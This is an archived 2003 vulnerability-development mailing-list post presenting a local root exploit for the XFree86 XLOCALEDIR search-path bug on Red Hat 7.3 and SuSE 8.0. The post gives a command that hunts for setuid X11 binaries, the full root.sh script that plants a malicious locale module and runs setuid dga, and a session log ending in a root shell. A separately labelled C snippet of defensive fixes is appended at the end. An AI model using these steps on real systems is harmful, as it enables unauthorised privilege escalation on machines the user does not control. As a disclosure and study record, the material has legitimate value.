Vulnerability Development mailing list archives

Re: xscreensaver exploit for Redhat 7.3


From: H D Moore <sflist () digitaloffense net>
Date: Sun, 9 Mar 2003 02:51:19 -0600

An old exploit I wrote for the XLOCALEDIR search path bug; it should apply
to a default Red Hat 7.3 install...

http://www.digitaloffense.net/shared_library_toys/xlocaledir.tar.gz

---

$ cat README
This is an exploit for a bug in xf86 4.2.0 and below; an announcement was
made by SuSE with id SuSE-SA:2002:032.

There is one major caveat to it though, the setuid application you call
has to call XtAppInitialize as root. The "xterm" example in the
tarball will absolutely not work, because it drops privileges before
initializing the application...

$ ./xterm
** calling XtSetLanguageProc as 500/0
** called XtSetLanguageProc as 500/0
( xterm drops privs here )
** XtSetErrorHandler: 500/500
** XtAppInitialize: 500/500
** not launching a shell, since we are running as id 500 (<- exploit.so)
** XtSetErrorHandler: 500/500
** XtGetApplicationResources: 500/500
Failed to open input method
(complains that the locale stuff is broken)
(launches xterm)

So.. For this to be useful at all, you have to find a setuid app which
doesn't drop privileges until after the XtAppInitialize call :(

To get a list of all suids linked against libX11:

# find / -perm +4000 -type f | xargs -i bash -c 'echo "Testing {}";ldd {}|grep X11'

Once you find a linked binary (not xterm or cardinfo though), edit root.sh
and change the xterm line to the name of the binary. Execute root.sh
and see if it drops a root shell ;)

The "dga" setuid on SuSE 8.0 gives root in a default install, just don't
run the exploit with the same X display as the one you are using or dga
will more than likely crash it. Either run the exploit from the console
(or remote connection), setting the display to :0.0, or start a second X
server up just to exploit (method used below).

hdm@masada:/projects/xlocaledir> cat root.sh
#!/bin/sh
#########

rm -rf locale
cp -a /usr/lib/X11/locale locale

make clean
make
cp exploit.so locale/common/xlcDef.so.2
export XLOCALEDIR=`pwd`/locale

# call your setuid here...
/usr/X11R6/bin/dga
hdm@masada:/projects/xlocaledir> Xwrapper :1 &
[1] 1480
hdm@masada:/projects/xlocaledir>
XFree86 Version 4.2.0 / X Window System
(protocol Version 11, revision 0, vendor release 6600)
Release Date: 23 January 2002
        If the server is older than 6-12 months, or if your card is
        newer than the above date, look for a newer version before
        reporting problems.  (See http://www.XFree86.Org/)
Build Operating System: SuSE Linux [ELF] SuSE
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
         (++) from command line, (!!) notice, (II) informational,
         (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: "/var/log/XFree86.1.log", Time: Thu Sep 19 13:45:56 2002
(==) Using config file: "/etc/X11/XF86Config"
(II) [GLX]: Calling GlxExtensionInit

hdm@masada:/projects/xlocaledir> export DISPLAY=:1.0
hdm@masada:/projects/xlocaledir> ./root.sh
/bin/rm -f   exploit.o exploit.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
1 addr:0x40227000, width 1792, bank size 33357824, depth 24 planes
** attempting to drop a root shell...
sh-2.05# (II) [GLX]: Calling GlxExtensionInit

sh-2.05# id
uid=0(root) gid=100(users)
groups=100(users),14(uucp),16(dialout),17(audio),33(video),42(trusted)


On Saturday 08 March 2003 02:47 am, Adam Gilmore wrote:
I don't think there are any vulnerabilities for the default
installation of RH7.3 (as far as suid root apps go). I tested this
vulnerability on xterm as well, but it seems xterm on RH7.3 drops root
privileges before it overflows. And besides, xterm isn't setuid root on
RH7.3 by default. So this isn't a *major* security risk for rh.

-----Original Message-----
From: Inode [mailto:inode () mediaservice net]
Sent: Saturday, 8 March 2003 6:46 AM
To: vuln-dev () securityfocus com
Subject: Re: xscreensaver exploit for Redhat 7.3

Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+
| Agazzini Maurizio                       Tel:   +39-011-32.72.100  |
| Security Analyst                        Fax:   +39-011-32.46.497  |
| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |
+-------------------------------------------------------------------+
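As an added example, not part of H D Moore's post or the tarball, here are the two defensive patterns the README above points at, in C with hypothetical names: a privileged process must ignore an environment-supplied search path such as XLOCALEDIR (the class of fix a library needs), and a setuid program should give up root before toolkit initialisation, the ordering that makes the xterm case in the README fail. It assumes the compiled-in default /usr/lib/X11/locale that root.sh copies from.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Compiled-in default; assumed from the path root.sh copies. */
#define DEFAULT_LOCALE_DIR "/usr/lib/X11/locale"

/* Secure-execution test: the process holds privileges the invoking user
 * does not have, so environment-supplied paths are untrusted input. */
int running_setugid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Policy for an environment-driven search path (hypothetical helper):
 * a privileged process ignores the variable entirely; an unprivileged
 * one may use it, but only as an absolute path. */
const char *choose_locale_dir(const char *env_value, int privileged)
{
    if (privileged || env_value == NULL || env_value[0] != '/')
        return DEFAULT_LOCALE_DIR;
    return env_value;
}

const char *locale_dir(void)
{
    return choose_locale_dir(getenv("XLOCALEDIR"), running_setugid());
}

/* The ordering the README credits xterm with: drop root before any
 * library call that consults the environment. 0 on success, -1 if the
 * drop failed or could be undone. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (uid != 0 && setuid(0) == 0)   /* must not be able to regain root */
        return -1;
    return 0;
}

int main(void)
{
    if (drop_privileges() != 0)
        return 1;
    /* Only now hand control to the toolkit (XtAppInitialize in the README). */
    printf("locale modules would be loaded from %s\n", locale_dir());
    return 0;
}
```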
